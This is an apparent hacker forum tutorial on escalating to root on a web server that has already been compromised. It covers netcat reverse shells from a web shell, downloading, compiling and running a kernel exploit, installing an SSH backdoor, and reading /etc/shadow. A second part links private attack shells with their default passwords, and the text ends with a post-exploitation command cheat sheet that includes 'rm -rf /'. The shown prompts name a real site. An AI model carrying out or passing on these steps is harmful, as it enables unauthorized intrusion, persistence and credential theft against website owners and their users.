# Things you need-
=> A Shell on a website
=> An Exploit
=> Log cleaner
=> Ssh Backdoor
=> Netcat
=> A Brain
=> Get these from Google ;) lolz
# What is rooting ?
A. Getting access to the user => "root", the main admin of the site.
# What is the need of rooting ?
A. Getting Juicy info :)
Now I begin,
# Getting Backconnection to the server-
=> Copy the Netcat directory to C:\
=> Open command prompt, type: CD C:\NETCAT
It'll look like this:
[code]
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\Ash>cd c:\netcat
c:\netcat>
[/code]
=> Now Type: nc -l -v -p 2121
It'll look like-
[code]
c:\netcat>nc -l -v -p 2121
listening on [any] 2121 ...
[/code]
=> Open your Shell in your browser, go to the backconnection tab, if it is not there get a shell like "B374k" or Any other
thats your choice.
=> Specify your ip & port as 2121. press connect, now you'll get a shell to the server, you can give commands to the server through that shell.
# Getting a Right exploit for the server-
=> Type : Uname -a & hit enter.
It'll look something like this:
[code]
[admin@www.saijyotishvani.com /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux dualxeon09.ns5.999servers.com 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux
[/code]
=> It shows the kernal version of the server is: 2.6.18-194.26.1.el5
& Year is 2010.
=> You need to find a perfect exploit for it. you can find them at-
# Exploit-db.com
# Packetstormsecurity.org
# Th3-0utl4ws.com
# Leetupload.com
# Compiling & executing exploit-
=> Now I've got a exploit, & it is written in C. So I can't execute it by just uploading. but I need to compile it.
=> Before proceeding further, Cd into the tmp directory, coz it is always writable. So type: Cd /home/XXXXX/public_html/tmp
// The path can be different, replace it with yours.
=> So first I'll get the exploit on the server, So I type : Wget http://exploitsite.net/2010-exploits/exploit.c
// Note: There is no such site, I'm just taking it to show you.
It'll look something Like this-
[code]
[admin@www.saijyotishvani.com /home/saijyoti/public_html/tmp]$ wget http://exploitsite.net/2010-exploits/exploit.c
--2011-01-25 08:21:43-- http://exploitsite.net/2010-exploits/exploit.c
Resolving www.exploitsite.net... 199.58.192.192
Connecting to www.exploitsite.net|199.58.192.192|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15088 (15K) [text/x-csrc]
Saving to: `exploit.c'
0K .......... .... 100% 189K=0.08s
2011-01-25 08:21:44 (189 KB/s) - `exploit.c' saved [15088/15088]
[/code]
=> now change the permission of the exploit to 777.
Type: Chmod 777 exploit.c
It may look like:
[code]
[admin@www.saijyotishvani.com /home/saijyoti/public_html/tmp]$ chmod 777 ImpelDown.c
[/code]
=> Now the exploit is On my server, I just need to compile & execute it.
So, I'll give the command: gcc -o exploit exploit.c
It'll compile & save the exploit as => exploit
It may look like-
[code]
[admin@www.saijyotishvani.com /home/saijyoti/public_html/tmp]$ gcc -o exploit exploit.c
[/code]
=> Next step is to execute it So we'll type: ./exploit
It may look like:
[code]
[admin@www.saijyotishvani.com /home/saijyoti/public_html/tmp]$ ./exploit
: here it'll show different process...
: #
: #
got root you m0f0 !!
[/code]
=> Now it say got root. Let's Check is it true,
Type: id
It may look like
[code]
uid=0(saijyoti) gid=0(saijyoti) groups=0(root)
[/code]
=> Which Means I got root :)
# Installing Backdoor-
=> type- Wget www.urlofbackdoor.com/sshdoor.zip
=> Then Type,
Unzip Sshdoor.zip
Then, => Cd sshdoor
=> Then type, ./run pass port
^ replace pass with your password, & a port.
=> Now connect with putty & enjoy root privileges. ;)
========================
>Understnading etc/shadow & etc/passwd
=> If required get the contents of => etc/passwd & etc/shadow
using this command => cat etc/passswd
similarly, with etc/shadow
=> /etc/shadow file stores actual password in encrypted format for user's account with additional properties related to user password i.e. it stores secure user account information.
All fields are separated by a colon (:) symbol. It contains one entry per line for each user listed in /etc/passwd file
=> If you will open etc/passwd, it'll show you something like this
root:x: .....
and so on...
where root is the username & x is the password saved in etc/shadow file...
=> Now, if you'll open the shadow file, you will see something like this
r00t:encrypted pass: last pass change: & bla bla bla
The encrypted password consists of 13 to 24 characters from the 64 character alphabet a through z,
A through Z, 0 through 9, \. and /. Optionally it can start with a "$" character.
This means the encrypted password was generated using another (not DES) algorithm.
For example if it starts with "$1$" it means the MD5-based algorithm was used.
=> Methods to execute exploits written in other languages-
#C exploit-
gcc -o exploit exploit.c
chmod +x exploit
./exploit
#Perl-
perl exploit.pl
#python-
python exploit.py
#php-
php exploit.php
#zip
unzip exploit.zip
./run
Part-2:
=======
=> Aim of this paper- To tell how to get r00t if don't get a backconnection to the server.
# Thing you need-
An ajax command shell or a cgi-bin telnet shell.
I've both, The ajax one is of ICW & the other one is of Unix Team.
you can do everything as I stated above in part-1, simply use these command shell to execute l33t exploits.
# PHP ajax command shell by Team ICW- http://pastie.org/private/eskwfygw4dqcbkf3tsw
Default uname and pass is => indishell
# Cgi-bin telnet shell by Team UNIX- http://pastie.org/private/hipxlweusrrlpsdllsjnlq
Default pass is jeen. save it as jen.jeen
These are my private shells, please don't post it in public forums.
===============================================
=> Backconnecting with Netcat-
Server can firewall all your BC traffic, so Try using netcat
=> Upload the Netcat c source, compile it as I had stated above & set the permissions to 777.
Then type this => ./nc -l -p port -e /bin/sh
Replace port with your open port...
you will get your shell spawned....
==================================================
Enjoy...& keep loving m3...
Imporatant cmds-
./../mainfile.php - Config file.
ls -la - Lists directory's.
ifconfig {eth0 etc} - Ipconfig equiv.
ps aux - Show running proccess's.
gcc in_file -o out_file - Compile c file.
cat /etc/passwd - List's accounts.
sudo - Superuser Do run a command as root provided you have perms
in /etc/sudoers.
id - Tells you what user your logged in as.
which wget curl w3m lynx - Check's to see what downloaders are
present.
uname -r - Shows all release info (or) cat /etc/release.
uname -a - Shows all kernal info (or) cat /etc/issue
last -30 - Last logged 30 ip's can change to desired number.
useradd - Create new user account.
usermod - Modify user account.
w - See who is currently logged on.
locate password.txt - Locates password.txt in current dur can use *.
rm -rf / - Please be carefull with this command, i cannot stress this
enough.
arp -a - Lists other machines are on the same subnet.
lsattr -va - ls file attributes on linux second extended file system
find / -type f -perm -04000 -ls - Finds suid files.
find . -type f -perm -04000 -ls - Finds suid files in current dir.
find / -type f -perm -02000 -ls - Finds all sgid files.
find / -perm -2 -ls - Finds all writable files and folders.
find . -perm -2 -ls - Finds all writable files and folders in current dir.
find / -type f -name .bash_history - Finds bash history.
netstat -an | grep -i listen - shows open ports.
cut -d: -f1,2,3 /etc/passwd | grep :: - From memory creates a user
with no pass.
find /etc/ -type f -perm -o+w 2> /dev/null - Write in /etc/passwd?.
cat /proc/version /proc/cpuinfo - Cpu info.
locate gcc- Finds gcc if installed.
set - Display system variables.
echo $path- Echo current path.
lsmod- Dumps kernal modules.
mount/df- Check mounted file system.
rpm -qa- Check patch level for RedHat 7.0.
dmesg- Check hardware ino.
cat /etc/syslog.conf - Log file.
uptime - Uptime check.
cat /proc/meminfo - Memory check.
find / -type f -perm -4 -print 2> /dev/null- Find readble files.
find / -type f -perm -2 -print 2> /dev/null - Find writable files.
chmod ### $folder - Chmod folder.
ls -l -b - Verbosly list directory's
